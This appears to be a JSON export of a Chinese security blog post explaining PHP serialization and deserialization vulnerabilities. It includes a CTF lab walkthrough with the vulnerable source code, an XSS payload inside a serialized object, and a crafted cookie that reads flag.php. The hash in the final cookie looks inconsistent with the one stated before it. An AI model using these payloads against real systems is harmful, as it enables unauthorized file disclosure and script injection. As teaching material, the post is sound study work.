{"id":387,"date":"2022-01-18T20:06:09","date_gmt":"2022-01-18T12:06:09","guid":{"rendered":"https:\/\/www.langsasec.cn\/?p=387"},"modified":"2022-11-14T22:38:53","modified_gmt":"2022-11-14T14:38:53","slug":"phpunserilization","status":"publish","type":"post","link":"https:\/\/blog.langsasec.cn\/index.php\/2022\/01\/18\/phpunserilization\/","title":{"rendered":"PHP\u53cd\u5e8f\u5217\u5316"},"content":{"rendered":"<h3><span class=\"ez-toc-section\" id=\"%e5%ba%8f%e5%88%97%e5%8c%96%e5%92%8c%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96\"><\/span>\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\n<p>\u5e8f\u5217\u5316\uff1a\u5c06\u5bf9\u8c61\u7684\u72b6\u6001\u4fe1\u606f\u8f6c\u6362\u4e3a\u53ef\u4ee5\u5b58\u50a8\u6216\u4f20\u8f93\u7684\u5f62\u5f0f\u7684\u8fc7\u7a0b\u3002<\/p>\n<p>\u628a\u4e00\u4e2a\u5bf9\u8c61\u53d8\u6210\u53ef\u4ee5\u4f20\u8f93\u7684\u5b57\u7b26\u4e32\uff08\u7c7b\u4f3c\u6e38\u620f<strong>\u5b58\u6863<\/strong>\uff09\u3002<\/p>\n<\/li>\n<\/ul>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">class S{\n        public $test=&quot;pikachu&quot;;\n    }\n    $s=new S(); \/\/\u521b\u5efa\u4e00\u4e2a\u5bf9\u8c61\n    serialize($s); \/\/\u628a\u8fd9\u4e2a\u5bf9\u8c61\u8fdb\u884c\u5e8f\u5217\u5316\n    \u5e8f\u5217\u5316\u540e\u5f97\u5230\u7684\u7ed3\u679c\u662f\u8fd9\u4e2a\u6837\u5b50\u7684:O:1:&quot;S&quot;:1:{s:4:&quot;test&quot;;s:7:&quot;pikachu&quot;;}\n        O:\u4ee3\u8868object\n        1:\u4ee3\u8868\u5bf9\u8c61\u540d\u5b57\u957f\u5ea6\u4e3a\u4e00\u4e2a\u5b57\u7b26\n        S:\u5bf9\u8c61\u7684\u540d\u79f0\n        1:\u4ee3\u8868\u5bf9\u8c61\u91cc\u9762\u6709\u4e00\u4e2a\u53d8\u91cf\n        s:\u6570\u636e\u7c7b\u578b\n        4:\u53d8\u91cf\u540d\u79f0\u7684\u957f\u5ea6\n        test:\u53d8\u91cf\u540d\u79f0\n        s:\u6570\u636e\u7c7b\u578b\n        7:\u53d8\u91cf\u503c\u7684\u957f\u5ea6\n        pikachu:\u53d8\u91cf\u503c<\/code><\/pre>\n<ul>\n<li>\n<p>\u53cd\u5e8f\u5217\u5316\uff1a\u5c06\u5b58\u50a8\u7684\u4e1c\u897f\u8f6c\u6362\u4e3a\u72b6\u6001\u4fe1\u606f\u3002<\/p>\n<p>\u628a\u88ab\u5e8f\u5217\u5316\u7684\u5b57\u7b26\u4e32\u8fd8\u539f\u4e3a\u5bf9\u8c61\uff08\u7c7b\u4f3c\u6e38\u620f<strong>\u8bfb\u6863<\/strong>\uff09\u3002<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">$u=unserialize(\"O:1:\"S\":1:{s:4:\"test\";s:7:\"pikachu\";}\");\n  echo $u->test; \/\/\u5f97\u5230\u7684\u7ed3\u679c\u4e3apikachu<\/code><\/pre>\n<\/li>\n<\/ul>\n<p>\u53c2\u8003\uff1a<a href=\"http:\/\/pikachu.langsasec.cn\/vul\/unserilization\/unserilization.php\">http:\/\/pikachu.langsasec.cn\/vul\/unserilization\/unserilization.php<\/a><\/p>\n<h3><span class=\"ez-toc-section\" id=\"%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e6%bc%8f%e6%b4%9e\"><\/span>\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u672c\u8eab\u6ca1\u6709\u95ee\u9898,\u4f46\u662f\u5982\u679c\u53cd\u5e8f\u5217\u5316\u7684\u5185\u5bb9\u662f\u7528\u6237\u53ef\u4ee5\u63a7\u5236\u7684,\u4e14\u540e\u53f0\u4e0d\u6b63\u5f53\u7684\u4f7f\u7528\u4e86PHP\u4e2d\u7684\u9b54\u6cd5\u51fd\u6570\uff08\u9b54\u672f\u65b9\u6cd5\uff09,\u5c31\u4f1a\u5bfc\u81f4\u5b89\u5168\u95ee\u9898<\/p>\n<h4><span class=\"ez-toc-section\" id=\"%e5%87%a0%e4%b8%aa%e5%87%bd%e6%95%b0\"><\/span>\u51e0\u4e2a\u51fd\u6570<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">1.__FILE__ \u83b7\u53d6\u5f53\u524d\u6587\u4ef6\u8def\u5f84\n2.show_source() \u663e\u793a\u6587\u4ef6\u6e90\u7801\n3.print_r() \u8f93\u51fa<\/code><\/pre>\n<h4><span class=\"ez-toc-section\" id=\"%e5%87%a0%e4%b8%aa%e9%ad%94%e6%9c%af%e6%96%b9%e6%b3%95\"><\/span>\u51e0\u4e2a\u9b54\u672f\u65b9\u6cd5<span class=\"ez-toc-section-end\"><\/span><\/h4>\n<p>\u9b54\u672f\u65b9\u6cd5\uff1a\u6ee1\u8db3\u6761\u4ef6\u81ea\u52a8\u89e6\u53d1<\/p>\n<ol>\n<li>\n<p>__construct()\u5f53\u4e00\u4e2a\u5bf9\u8c61\u521b\u5efa\u65f6\u88ab\u8c03\u7528<\/p>\n<\/li>\n<li>\n<p>__destruct()\u5f53\u4e00\u4e2a\u5bf9\u8c61\u9500\u6bc1\u65f6\u88ab\u8c03\u7528<\/p>\n<\/li>\n<li>\n<p>__toString()\u5f53\u4e00\u4e2a\u5bf9\u8c61\u88ab\u5f53\u4f5c\u4e00\u4e2a\u5b57\u7b26\u4e32\u4f7f\u7528<\/p>\n<\/li>\n<li>\n<p>__sleep() \u5728\u5bf9\u8c61\u5728\u88ab\u5e8f\u5217\u5316\u4e4b\u524d\u8fd0\u884c<\/p>\n<\/li>\n<li>\n<p>__wakeup\u5c06\u5728\u5e8f\u5217\u5316\u4e4b\u540e\u7acb\u5373\u88ab\u8c03\u7528<\/p>\n<\/li>\n<\/ol>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">\u6f0f\u6d1e\u6848\u4f8b\n    class S{\n            var $test = &quot;pikachu&quot;;\n            function __destruct(){\n                echo $this-&gt;test;\n            }\n        }\n        $s = $_GET[&#039;test&#039;];\n        @$unser = unserialize($a);\n\n        payload:O:1:&quot;S&quot;:1:{s:4:&quot;test&quot;;s:29:&quot;&lt;script&gt;alert(&#039;xss&#039;)&lt;\/script&gt;&quot;;}<\/code><\/pre>\n<p>\u53c2\u8003\uff1a<a href=\"http:\/\/pikachu.langsasec.cn\/vul\/unserilization\/unserilization.php\">http:\/\/pikachu.langsasec.cn\/vul\/unserilization\/unserilization.php<\/a><\/p>\n<p>\u6269\u5c55\uff1aphar:\/\/(php\u652f\u6301\u7684\u534f\u8bae) \uff1a\u8fd0\u7528\u8be5\u534f\u8bae\u8bfb\u53d6\u6587\u4ef6\u53ef\u4ee5\u81ea\u52a8\u53cd\u5e8f\u5217\u5316<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%e9%9d%b6%e5%9c%ba\"><\/span>\u9776\u573a<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>1.flag\u5728flag.php\u4e2d\uff0c\u6240\u4ee5\u6211\u4eec\u9700\u8981\u901a\u8fc7\u53cd\u5e8f\u5217\u5316\u6765\u5c06\u5b83\u663e\u793a\u51fa\u6765<\/p>\n<p>2.\u4e0b\u9762\u662f\u6e90\u4ee3\u7801\u53ca\u5176\u6ce8\u91ca<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-php\">&lt;?php\nClass readme{\n    public function __toString()\n    {\n        return highlight_file(&#039;Readme.txt&#039;, true).highlight_file($this-&gt;source, true); \/\/$this-&gt;source\uff1a\u8c03\u7528$source\u7684\u503c\n    }\n}\nif(isset($_GET[&#039;source&#039;])){\n    $s = new readme();\n    $s-&gt;source = __FILE__;\n    echo $s;\n    exit;\n}\n\/\/$todos = [];\u662f\u4e2a\u6570\u7ec4\nif(isset($_COOKIE[&#039;todos&#039;])){\n    $c = $_COOKIE[&#039;todos&#039;];\n    $h = substr($c, 0, 32);  \/\/$h\u662f$c\u524d32\u4f4d\u5b57\u7b26\u4e32\n    $m = substr($c, 32);     \/\/$m\u662f$c32\u4f4d\u540e\u7684\u5b57\u7b26\u4e32\n    if(md5($m) === $h){\n        $todos = unserialize($m);  \/\/\u53cd\u5e8f\u5217\u5316\u51fd\u6570\u5728\u8fd9\u91cc\n    }\n}\nif(isset($_POST[&#039;text&#039;])){\n    $todo = $_POST[&#039;text&#039;];\n    $todos[] = $todo;\n    $m = serialize($todos);\n    $h = md5($m);\n    setcookie(&#039;todos&#039;, $h.$m);\n    header(&#039;Location: &#039;.$_SERVER[&#039;REQUEST_URI&#039;]);\n    exit;\n}\n?&gt;\n&lt;html&gt;\n&lt;head&gt;\n&lt;\/head&gt;\n\n&lt;h1&gt;Readme&lt;\/h1&gt;\n&lt;a href=&quot;?source&quot;&gt;&lt;h2&gt;Check Code&lt;\/h2&gt;&lt;\/a&gt;\n&lt;ul&gt;\n&lt;?php foreach($todos as $todo):?&gt;   \/\/\u5c06\u6570\u7ec4\u53d8\u6210\u5b57\u7b26\u4e32\uff0c\n    &lt;li&gt;&lt;?=$todo?&gt;&lt;\/li&gt;  \/\/&lt;?=$todo?&gt;\/\/\u662f&lt;?php echo $todo?&gt;\/\/\u7f29\u5199\uff0c\u8f93\u51fa\u70b9\uff0c\n&lt;?php endforeach;?&gt;\n&lt;\/ul&gt;\n\n&lt;form method=&quot;post&quot; href=&quot;.&quot;&gt;\n    &lt;textarea name=&quot;text&quot;&gt;&lt;\/textarea&gt;\n    &lt;input type=&quot;submit&quot; value=&quot;store&quot;&gt;\n&lt;\/form&gt;<\/code><\/pre>\n<p>3.\u901a\u8fc7$todo\u8f93\u51fa$a-&gt;source='flag.php';\u6765\u89e6\u53d1$this-&gt;source\u4ece\u800c\u663e\u793aflag.php<\/p>\n<p>4.\u6784\u9020\u9700\u8981\u89e6\u53d1\u7684$todos,\u90a3\u4e48$m=a:1:{i:0;O:6:&quot;readme&quot;:1:{s:6:&quot;source&quot;;s:8:&quot;flag.php&quot;;}}<img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/66b0a4e9996921b0fc33983270c76e6a.png\" alt=\"image-20220118193604057\" title=\"PHP\u53cd\u5e8f\u5217\u5316\u63d2\u56fe\" \/><\/p>\n<p>[\u5916\u94fe\u56fe\u7247\u8f6c\u5b58\u5931\u8d25,\u6e90\u7ad9\u53ef\u80fd\u6709\u9632\u76d7\u94fe\u673a\u5236,\u5efa\u8bae\u5c06\u56fe\u7247\u4fdd\u5b58\u4e0b\u6765\u76f4\u63a5\u4e0a\u4f20(img-k1FctLWQ-1668436711768)(<a href=\"https:\/\/s2.loli.net\/2022\/01\/18\/7CiPvEtlVX915Gr.png\" rel=\"box\" class=\"fancybox\">https:\/\/s2.loli.net\/2022\/01\/18\/7CiPvEtlVX915Gr.png<\/a>)]<\/p>\n<p>5.\u4ece\u4ee3\u7801\u53ef\u77e5\u6211\u4eec\u9700\u8981\u4f7f\u5f97cookie\u6ee1\u8db3\u4e00\u5b9a\u7684\u6761\u4ef6<\/p>\n<p>\u6761\u4ef6\uff1a<\/p>\n<p>$c=$h.$m<\/p>\n<p>md5($m) === $h\uff0c\u5219$h=e10adc3949ba59abbe56e057f20f883e<\/p>\n<p>\u6240\u4ee5\u6700\u7ec8\u6761\u4ef6\u662f\u5c06cookie\u8bbe\u7f6etodos\u4e3a\u5982\u4e0b<\/p>\n<p>e2d4f7dcc43ee1db7f69e76303d0105ca:1:{i:0;O:6:&quot;readme&quot;:1:{s:6:&quot;source&quot;;s:8:&quot;flag.php&quot;;}}<\/p>\n<p>6.\u5c06\u4e0a\u8ff0\u5b57\u7b26\u4e32url\u7f16\u7801\u540e\u586b\u5165cookie\u5f97\u5230flag<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/aca6d12f8186b50d1fceb281293ddee6.png\" alt=\"image-20220118195558464\" title=\"PHP\u53cd\u5e8f\u5217\u5316\u63d2\u56fe1\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/img-blog.csdnimg.cn\/img_convert\/eec82e4f8b97a165cb7492c0e78f25e0.png\" alt=\"image-20220118195644379\" title=\"PHP\u53cd\u5e8f\u5217\u5316\u63d2\u56fe2\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316 \u5e8f\u5217\u5316\uff1a\u5c06\u5bf9\u8c61\u7684\u72b6\u6001\u4fe1\u606f\u8f6c\u6362\u4e3a\u53ef\u4ee5\u5b58\u50a8\u6216\u4f20\u8f93\u7684\u5f62\u5f0f\u7684\u8fc7\u7a0b\u3002 \u628a\u4e00\u4e2a\u5bf9\u8c61\u53d8\u6210\u53ef\u4ee5\u4f20\u8f93\u7684\u5b57\u7b26\u4e32\uff08 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22,19],"tags":[],"class_list":["post-387","post","type-post","status-publish","format-standard","hentry","category-webpt-studynote","category-penetration-test"],"_links":{"self":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/387","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/comments?post=387"}],"version-history":[{"count":4,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/387\/revisions"}],"predecessor-version":[{"id":1068,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/387\/revisions\/1068"}],"wp:attachment":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/media?parent=387"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/categories?post=387"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/tags?post=387"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}